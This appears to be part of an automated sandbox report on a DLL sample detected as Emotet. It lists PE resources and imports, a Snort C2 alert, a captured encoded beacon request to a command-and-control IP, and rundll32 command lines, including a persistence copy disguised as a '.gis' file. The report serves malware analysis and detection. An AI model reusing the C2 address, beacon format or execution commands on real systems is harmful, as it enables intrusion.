RT_MENU | 0xa12f0 | 0x42e | data | English | United States
RT_MENU | 0xa1720 | 0x25c | data | English | United States
RT_MENU | 0xa197c | 0x478 | data | English | United States
RT_DIALOG | 0xa1df4 | 0x1da | data | English | United States
RT_DIALOG | 0xa1fd0 | 0x3ea | data | English | United States
RT_DIALOG | 0xa23bc | 0x250 | data | English | United States
RT_DIALOG | 0xa260c | 0xd2 | data | English | United States
RT_DIALOG | 0xa26e0 | 0xe8 | data | English | United States
RT_DIALOG | 0xa27c8 | 0x1a2 | data | English | United States
RT_DIALOG | 0xa296c | 0x15a | data | English | United States
RT_DIALOG | 0xa2ac8 | 0x34 | data | English | United States
RT_STRING | 0xa2afc | 0x102 | data | English | United States
RT_STRING | 0xa2c00 | 0x124 | data | English | United States
RT_STRING | 0xa2d24 | 0xd8 | data | English | United States
RT_STRING | 0xa2dfc | 0x7c | data | English | United States
RT_STRING | 0xa2e78 | 0xaa | data | English | United States
RT_STRING | 0xa2f24 | 0x8c | data | English | United States
RT_STRING | 0xa2fb0 | 0xa2 | data | English | United States
RT_STRING | 0xa3054 | 0x1d2 | data | English | United States
RT_STRING | 0xa3228 | 0xb0 | data | English | United States
RT_STRING | 0xa32d8 | 0x23e | data | English | United States
RT_STRING | 0xa3518 | 0x100 | data | English | United States
RT_STRING | 0xa3618 | 0x220 | data | English | United States
RT_STRING | 0xa3838 | 0x46 | data | English | United States
RT_STRING | 0xa3880 | 0x86 | data | English | United States
RT_STRING | 0xa3908 | 0x1ac | data | English | United States
RT_STRING | 0xa3ab4 | 0xae | data | English | United States
RT_STRING | 0xa3b64 | 0xca | data | English | United States
RT_STRING | 0xa3c30 | 0x2a | data | English | United States
RT_STRING | 0xa3c5c | 0x192 | data | English | United States
RT_STRING | 0xa3df0 | 0x124 | data | English | United States
RT_STRING | 0xa3f14 | 0x5e | data | English | United States
RT_STRING | 0xa3f74 | 0x4a | data | English | United States
RT_STRING | 0xa3fc0 | 0x4e2 | data | English | United States
RT_STRING | 0xa44a4 | 0x31a | data | English | United States
RT_STRING | 0xa47c0 | 0x2dc | data | English | United States
RT_STRING | 0xa4a9c | 0x8a | data | English | United States
RT_STRING | 0xa4b28 | 0x32e | data | English | United States
RT_STRING | 0xa4e58 | 0xde | data | English | United States
RT_STRING | 0xa4f38 | 0x4c4 | data | English | United States
RT_STRING | 0xa53fc | 0x264 | data | English | United States
RT_STRING | 0xa5660 | 0x2c | data | English | United States
RT_STRING | 0xa568c | 0x42 | data | English | United States
RT_ACCELERATOR | 0xa56d0 | 0x78 | data | English | United States
RT_ACCELERATOR | 0xa5748 | 0x50 | data | English | United States
RT_ACCELERATOR | 0xa5798 | 0x18 | data | English | United States
RT_GROUP_CURSOR | 0xa57b0 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
RT_GROUP_CURSOR | 0xa57d4 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States
                                                                                                      RT_GROUP_CURSOR0xa57f80x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa581c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58400x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58640x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58880x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58ac0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58d00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58f40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa593c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa599c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a780x14dataEnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a8c0x14dataEnglishUnited States
                                                                                                      RT_MANIFEST0xa5aa00x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                      Imports

DLL | Import
KERNEL32.dll | RaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapDestroy, HeapCreate, VirtualFree, Sleep, GetStdHandle, GetACP, GetTimeZoneInformation, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, RtlUnwind, GetStringTypeW, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, LCMapStringA, LCMapStringW, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, GetProcessHeap, GetCommandLineA, GetDateFormatA, GetTimeFormatA, GetSystemTimeAsFileTime, HeapReAlloc, VirtualQuery, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapAlloc, HeapFree, GetCurrentDirectoryA, GetShortPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetProfileIntA, GetOEMCP, GetCPInfo, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetThreadLocale, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetFileSize, CreateFileA, CloseHandle, SystemTimeToFileTime, LocalFileTimeToFileTime, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToSystemTime, GetModuleFileNameA, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, LocalAlloc, LocalLock, LocalUnlock, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, lstrcmpA, InterlockedIncrement, GetCurrentProcessId, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, GlobalAlloc, FormatMessageA, LocalFree, FreeLibrary, InterlockedDecrement, GlobalFree, FreeResource, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, SetLastError, GetTickCount, MulDiv, lstrcpynA, LoadLibraryA, ExitProcess, GetVersion, CompareStringA, LockResource, lstrcmpiA, GetLastError, InterlockedExchange, GetStringTypeExA, lstrlenW, MultiByteToWideChar, CompareStringW, SizeofResource, WideCharToMultiByte, LoadResource, lstrlenA, FindResourceA, GlobalMemoryStatus, GetStringTypeA
USER32.dll | SetCapture, GetDCEx, FindWindowA, SetWindowRgn, DestroyIcon, LockWindowUpdate, ShowOwnedPopups, PostQuitMessage, LoadCursorA, DestroyCursor, GetTabbedTextExtentA, MessageBeep, IsClipboardFormatAvailable, RedrawWindow, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, SetParent, WindowFromDC, InSendMessage, ClipCursor, GetCursorPos, PostThreadMessageA, CreateMenu, CopyAcceleratorTableA, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, SetCursor, ReleaseCapture, InsertMenuItemA, CreatePopupMenu, SetMenu, TranslateAcceleratorA, InvalidateRect, SetRectEmpty, ShowWindow, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, DeleteMenu, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, GetMenu, PostMessageA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, DeferWindowPos, CopyRect, GetScrollInfo, SetScrollInfo, PtInRect, SetWindowPlacement, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindow, GetMenuStringA, AppendMenuA, GetMenuItemID, InsertMenuA, GetMenuItemCount, GetSubMenu, RemoveMenu, UnhookWindowsHookEx, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, IsWindow, GetWindowLongA, EnableWindow, GetSystemMetrics, SetRect, LoadAcceleratorsA, GetDlgItem, IsWindowEnabled, GetNextDlgTabItem, EndDialog, GetSysColor, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, ScreenToClient, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetMenuItemBitmaps, WindowFromPoint, GetMenuItemInfoA, UnregisterClassA, GetSysColorBrush, RegisterClipboardFormatA, GetMessageA, TranslateMessage, BeginDeferWindowPos, ValidateRect, GetClientRect, DrawIcon, wsprintfA, CharUpperA, LoadIconA, FillRect, MessageBoxA, IsZoomed, SendMessageA, IsWindowVisible, IsRectEmpty, InflateRect, UpdateWindow, SetWindowTextA, SetWindowPos, ReleaseDC, CreateWindowExA, BringWindowToTop, SetWindowLongA, GetDC, GetParent, GetFocus, KillTimer, GetWindowRect, SetTimer, DestroyWindow, IsIconic, CheckMenuItem, EnableMenuItem, GetMenuState, ModifyMenuA, LoadBitmapA, GetMenuCheckMarkDimensions
GDI32.dll | SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, DeleteDC, CreatePatternBrush, CreatePen, CreateSolidBrush, CopyMetaFileA, CreateDCA, GetCharWidthA, CreateFontA, StretchDIBits, SetBrushOrgEx, CreateMetaFileA, SetWindowOrgEx, DeleteMetaFile, GetTextExtentPoint32A, DPtoLP, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, GetViewportOrgEx, GetBkColor, UnrealizeObject, GetTextAlign, GetWindowOrgEx, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextFaceA, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, CloseMetaFile, GetStockObject, GetViewportExtEx, CreateRectRgn, SelectClipRgn, DeleteObject, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, CreateBitmap, GetDeviceCaps, CreateFontIndirectA, GetObjectA, GetTextMetricsA, StretchBlt, CreateCompatibleDC, CreateCompatibleBitmap, Rectangle, GetWindowExtEx
comdlg32.dll | GetFileTitleA
WINSPOOL.DRV | GetJobA, DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll | RegQueryValueA, RegEnumKeyA, GetFileSecurityA, SetFileSecurityA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegSetValueA, RegCloseKey, RegCreateKeyA
SHELL32.dll | DragFinish, DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragAcceptFiles
SHLWAPI.dll | PathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll | 
ole32.dll | OleIsCurrentClipboard, OleFlushClipboard, CoRegisterClassObject, CoRevokeClassObject, OleUninitialize, CoFreeUnusedLibraries, OleInitialize, OleLockRunning, CoRegisterMessageFilter, OleSetClipboard, CreateFileMoniker, StgCreateDocfile, CoDisconnectObject, CreateGenericComposite, CreateItemMoniker, CreateStreamOnHGlobal, OleSaveToStream, WriteClassStm, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, CreateDataAdviseHolder, OleRegGetMiscStatus, CreateOleAdviseHolder, OleRegEnumVerbs, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, IsAccelerator, OleTranslateAccelerator, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CreateBindCtx, StringFromCLSID, OleRegGetUserType, WriteClassStg, CoTaskMemFree, CoLockObjectExternal, OleRun, GetRunningObjectTable, OleIsRunning, StgIsStorageFile, StgOpenStorage
OLEAUT32.dll | SysStringLen, SysStringByteLen, VariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysFreeString

                                                                                                      Exports

Name | Ordinal | Address
Control_RunDLL | 1 | 0x10003680

                                                                                                      Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States | 

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/01/21-16:12:03.931139 | TCP | 2404336 | ET CNC Feodo Tracker Reported CnC Server TCP group 19 | 49775 | 443 | 192.168.2.4 | 51.178.61.60

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 1, 2021 16:12:03.931138992 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:03.931215048 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:03.931405067 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:04.000613928 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:04.000655890 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:04.110825062 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:04.110970974 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:04.498553991 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:04.498589993 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:04.499031067 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:04.500966072 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:04.530108929 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:04.572871923 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:05.137804985 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:05.137996912 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4
Dec 1, 2021 16:12:05.138084888 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:05.138143063 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:05.140539885 CET | 49775 | 443 | 192.168.2.4 | 51.178.61.60
Dec 1, 2021 16:12:05.140568018 CET | 443 | 49775 | 51.178.61.60 | 192.168.2.4

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 51.178.61.60

                                                                                                      HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49775 | 51.178.61.60 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-12-01 15:12:04 UTC | 0 | OUT | GET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1
Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIw
Host: 51.178.61.60
Connection: Keep-Alive
Cache-Control: no-cache
2021-12-01 15:12:05 UTC | 0 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Dec 2021 15:12:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2021-12-01 15:12:05 UTC | 0 | IN | Data Raw: 33 30 31 0d 0a 20 9b c5 28 57 37 9f 3b 96 c5 45 95 6a a2 15 b8 f4 41 76 33 3b ae 0c 15 49 0c 36 5e b0 1c a1 f1 ce c4 2c 55 d6 d6 fc 1c 98 3c 7e 88 82 5f 6c 2f 4e e2 0f 21 bc e0 f2 81 2a fb 54 ba cc bf 3f fc 78 46 1b 08 69 e2 c9 45 ab 80 93 45 3a b1 42 b0 fc e3 4e d5 c5 bf ab aa a3 1a d4 4c 37 2b d5 91 d5 66 47 03 03 c8 e7 99 d1 79 ba 02 78 00 80 d4 41 66 62 7c e6 70 bd 5a 59 53 09 03 8c 61 da bc e5 49 9b 2e 3c e7 d1 da 37 14 bd 10 da 06 40 80 f1 bb 3a c8 df bd de 88 04 fe 52 5b 0f 7b b3 06 81 84 b9 3d fe 81 b3 67 8a 1a 85 d6 95 9c 9d 82 a0 e1 92 a6 3d f4 20 6e 13 cc 5e ef d7 83 b6 fd 9a 50 74 28 1e 96 17 e7 ac 6f 22 2f c0 1c f0 93 f3 a9 16 9f ec 0c 20 7a 49 68 f1 19 c7 59 c3 a4 f5 cf 06 c8 55 0c 84 b7 3a ce 7b f4 a7 73 e2 8b ce df b1 6f a7 82 10 0a 01 64
Data Ascii: 301 (W7;EjAv3;I6^,U<~_l/N!*T?xFiEE:BNL7+fGyxAfb|pZYSaI.<7@:R[{=g= n^Pt(o"/ zIhYU:{sod


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
                                                                                                      Imagebase:0xd30000
                                                                                                      File size:893440 bytes
                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:55
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:16:11:56
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1231555705.0000000003380000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232688117.0000000005A90000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232447127.0000000005810000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232307431.0000000005601000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1231756136.00000000034D1000.00000020.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232722292.0000000005AC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232778778.0000000005BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1232026757.0000000004EA0000.00000040.00000001.sdmp, Author: Joe Security
